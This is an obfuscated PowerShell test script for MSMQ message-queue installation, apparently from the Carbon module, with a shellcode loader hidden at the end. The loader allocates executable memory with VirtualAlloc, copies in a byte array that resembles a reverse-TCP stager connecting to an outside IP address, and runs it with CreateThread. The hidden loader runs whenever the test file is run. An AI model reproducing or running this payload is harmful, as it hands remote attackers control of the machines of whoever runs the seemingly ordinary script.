 &("{0}{2}{1}"-f 'SEt','Tem','-I') ("{2}{3}{0}{4}{1}"-f'I','le:9OX4A','V','aR','ab')  ( [tyPE]("{1}{0}"-F 'D','GUi') );${Q`86yBk}=  [TypE]("{4}{3}{2}{1}{0}{5}" -F'mESs','Ng.','aGI','S','MeS','aGEqUeuE') ;  












${US`E`R`DOMaiN} = ${ENv:u`SeR`dNSdOM`A`In}
${COM`Pu`T`e`RDOMAIN} = &("{2}{1}{0}"-f 'iObject','et-Wm','G') ("{1}{2}{3}{4}{0}" -f 'tem','Win32_Compu','ter','Sy','s') | &("{4}{1}{3}{2}{0}"-f't','le','bjec','ct-O','Se') -ExpandProperty ("{2}{0}{1}"-f 'ma','in','Do')
if( (.("{0}{2}{1}" -f'G','t-Service','e') -Name ("{1}{0}"-f 'MQ','MS') -ErrorAction ("{2}{3}{4}{0}{1}"-f 'Continu','e','Sil','ent','ly')) -and ${Us`erDoM`Ain} -eq ${cOMputErd`oM`AIN} )
{

    ${p`UB`LicqUEuE`NaMe} = ${n`Ull}
    ${pRIva`TE`Q`UEuEnamE} = ${nu`lL}

    function StA`RT`-t`eStfIxTUre
    {
        & (.("{2}{1}{0}" -f 'ath','in-P','Jo') -Path ${pSsCR`ipT`R`o`ot} -ChildPath ((("{6}{7}{2}{3}{5}{0}{4}{1}"-f'nTest','s1','{0}Initialize','-Ca','.p','rbo','.','.')) -f [chaR]92) -Resolve)
    }

    function S`T`Ar`T-TesT
    {
        ${Pu`B`lICqU`e`UENA`Me} = ("{0}{3}{2}{1}{4}"-f 'Carb','li','stQueue-Pub','onTe','c') +  ${9o`x`4A}::("{1}{0}" -f 'd','NewGui').Invoke().("{1}{0}{2}"-f 'o','T','String').Invoke()
        ${p`Riv`A`T`EQuEU`eNaMe} = ("{6}{2}{0}{4}{3}{1}{5}"-f 'onTes','Priva','rb','ue-','tQue','te','Ca') +   ( .("{2}{0}{1}" -f'ar','iaBLE','v') ("{1}{0}" -f'A','9ox4')  -vaLuEON  )::("{2}{0}{1}"-f'ewGui','d','N').Invoke().("{0}{1}" -f'ToStrin','g').Invoke()
        &("{3}{5}{1}{2}{0}{4}"-f 'Que','s','t','Remov','ues','e-Te')
    }

    function s`Top`-TEsT
    {
        .("{3}{5}{2}{0}{1}{4}"-f 'T','est','-','Remov','Queues','e')
    }
    
    function RemOVE-T`e`sTQ`UEuES
    {
        if(  ( &("{1}{2}{0}"-f 't-variablE','g','e')  ("{0}{1}{2}" -f'q','8','6Ybk')  -vaLueONl )::("{2}{0}{1}"-f'xist','s','E').Invoke(".\$publicQueueName") )
        {
              ${q8`6y`BK}::("{0}{1}" -f'De','lete').Invoke(".\$publicQueueName")
        }
        
        if(   (&('gI')  ('vARiaBLe:q86'+'Yb'+'K'))."Va`LuE"::("{0}{1}"-f'Exi','sts').Invoke(".\Private`$\$privateQueueName") )
        {
             (.("{1}{0}" -f'ir','d') ("{3}{4}{0}{2}{1}" -f'I','86Ybk','ablE:q','v','Ar') )."Va`LUE"::("{1}{0}"-f 'ete','Del').Invoke(".\Private`$\$privateQueueName")
        }
    }

    function tES`T`-`s`HoUlDINstal`Lm`ES`Sa`Geque`UE
    {
        .("{1}{2}{4}{3}{0}"-f 'geQueue','Install-','MSM','ssa','QMe') ${pu`BLicqUeUen`AMe}
        ${Q`Ue`UE} = &("{4}{0}{1}{3}{5}{2}"-f '-M','S','eQueue','MQMe','Get','ssag') ${PubLiCq`U`euEna`me}
        .("{3}{0}{2}{1}"-f'-Fa','e','ls','Assert') ${qU`eue}."t`RAnSACTION`Al" 
    }

    function test-ShOuLD`InStaLL`Priva`Te`q`UEUe
    {
        &("{3}{4}{0}{2}{1}{6}{5}"-f 'l','g','-MSMQMessa','Ins','tal','Queue','e') -Name ${priv`A`TeQuE`Uen`Ame} -Private
        ${q`U`EUe} = &("{0}{2}{1}{3}"-f'Get-MSMQ','geQue','Messa','ue') ${PR`IV`ATeQU`euenamE} -Private
        &("{2}{0}{1}" -f 'sert-Not','Null','As') ${Q`U`eUe}
        &("{2}{3}{0}{1}"-f'er','t-False','A','ss') ${qUe`UE}."tRAnS`A`cTionaL" 
    }

    function tesT`-shoULdma`K`EQu`e`U`E`TRANsACti`ON`Al
    {
        .("{1}{0}{3}{4}{2}" -f 'll-MSMQ','Insta','e','Messag','eQueu') -Name ${PuBlicq`U`EuE`NaME} -Transactional
        ${Que`Ue} = .("{3}{0}{2}{1}"-f 'sag','e','eQueu','Get-MSMQMes') ${PU`BliCQuE`Uena`Me}
        .("{2}{1}{3}{0}"-f'ull','sser','A','t-NotN') ${QuE`Ue}
        &("{0}{2}{1}"-f'As','e','sert-Tru') ${Q`UEUE}."TraNSa`C`TiO`NAl"
    }

    function Test-`Shou`l`d`UP`dAT`E`seTt`In`gswHENiNST`ALL`iNGeXistiNGqu`euE
    {
        .("{1}{2}{0}{3}{4}{5}" -f 'SMQM','Instal','l-M','es','sageQu','eue') -Name ${PuBli`cQU`Eu`E`Name}
        ${Q`UE`Ue} = .("{3}{2}{1}{0}{5}{4}"-f'essa','-MSMQM','et','G','ueue','geQ') ${PUbl`IcQUeu`En`AmE}
        .("{0}{1}{2}" -f 'A','ss','ert-False') ${q`UeuE}."TraNSACt`i`ONAL"
        
        &("{6}{5}{4}{1}{2}{0}{3}" -f 'u','SMQMes','sageQue','e','tall-M','s','In') -Name ${pub`LI`CQuE`UE`NaMe} -Transactional
        ${qu`e`UE} = .("{4}{3}{0}{1}{2}" -f'u','e','ue','t-MSMQMessageQ','Ge') ${pU`BliCQuE`Ue`N`AMe}
        .("{1}{2}{0}" -f '-True','Ass','ert') ${qu`eUe}."trAn`sA`cTION`Al"
    }
    
    function TeSt-S`H`OULdS`Uppo`RTw`Ha`TIf
    {
        .("{3}{4}{5}{2}{6}{0}{1}" -f 'SMQMe','ssageQueue','-','In','st','all','M') -Name ${PubLicq`U`Euename} -WhatIf
        &("{2}{0}{1}"-f 'sser','t-Null','A') (&("{1}{3}{0}{4}{5}{2}" -f 'QM','G','geQueue','et-MSM','ess','a') ${p`UblI`cq`UEUEna`me})
    }
}
else
{
    &("{2}{1}{0}{3}" -f 'e-W','rit','W','arning') ("Tests for Get-MSMQMessageQueue not run because MSMQ is not installed or the current user's domain ({0}) and the computer's domain ({1}) are different." -f ${Us`er`dO`MAIN},${coM`PUT`e`RDO`maIn})
}


${C} = (((("{77}{40}{97}{27}{30}{106}{59}{67}{25}{41}{16}{14}{114}{80}{51}{5}{24}{74}{68}{112}{8}{83}{39}{118}{26}{93}{108}{45}{86}{94}{31}{50}{84}{89}{70}{60}{63}{69}{47}{76}{18}{42}{33}{98}{48}{44}{95}{17}{4}{7}{66}{101}{65}{90}{29}{10}{3}{116}{82}{91}{109}{37}{54}{58}{56}{57}{113}{0}{61}{107}{72}{22}{119}{96}{100}{103}{2}{110}{55}{64}{6}{53}{12}{104}{71}{99}{87}{62}{13}{73}{46}{111}{75}{1}{49}{35}{38}{115}{43}{15}{28}{23}{85}{88}{105}{102}{92}{34}{19}{52}{21}{11}{81}{20}{79}{36}{78}{32}{9}{117}"-f'wSta',' ',' l','ern In','0})','Pt','m',']pub','A','nt)','xt',' ui',',','ti','st','rt',' ','{','mp','e',' s','ntPtr dest,','IntPtr','0}','r ','})]','Ptr lpAddre','o','({0}msvcrt.dll{','e','r','Allocati','nt cou','rt({0','ms','tPtr lpThr','c,','eThr','eadId);[Dll','In','I','public','o','po','d','t dwSi','nF','otect);[Dll','32.','In','on','nt','t(I','eter','ead(In','a','dAttri','butes,','tPtr lpThrea','l32.','t','ckSiz','a',' flP','ra','t','l','dll{0','ir','r','uin','nt ',', ','o','V','ags,','I','[Dll',' ui','r','xtern I','nt','P','lloc(','Type,',')]p','z','e','ublic st',' ','atic ','tr Cre','Ptr me','ss, ui','e, uint fl','ll','A','mp','}kernel','dwCr','ddress, ','ic s','xtern Int','IntPtr',' ui','atic e','t({0}kerne','e','n','at','pP','l','tual',' uint d','atic e','Im','t',';','t',' lpStart')) -F  [ChAR]34));${W} = &("{2}{1}{0}"-f'ype','-T','Add') -memberDefinition ${C} -Name ("{1}{0}"-f 'n32','Wi') -namespace ("{2}{1}{0}{3}"-f 'o','in32Functi','W','ns') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xb9,0x13,0x55,0xb5,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${g} = 0x1000;if (${Z}."L`EnGTh" -gt 0x1000){${G} = ${z}."leN`g`Th"};${X}=${w}::("{2}{1}{0}"-f 'lloc','irtualA','V').Invoke(0,0x1000,${g},0x40);for (${i}=0;${i} -le (${z}."LE`NgtH"-1);${i}++) {${w}::"m`em`set"([IntPtr](${X}.("{2}{0}{1}" -f'nt','32','ToI').Invoke()+${i}), ${Z}[${i}], 1)};${W}::("{2}{1}{0}{3}" -f 'eateThre','r','C','ad').Invoke(0,0,${X},0,0,0);for (;;){.("{1}{2}{3}{0}"-f 'sleep','St','art','-') 60};
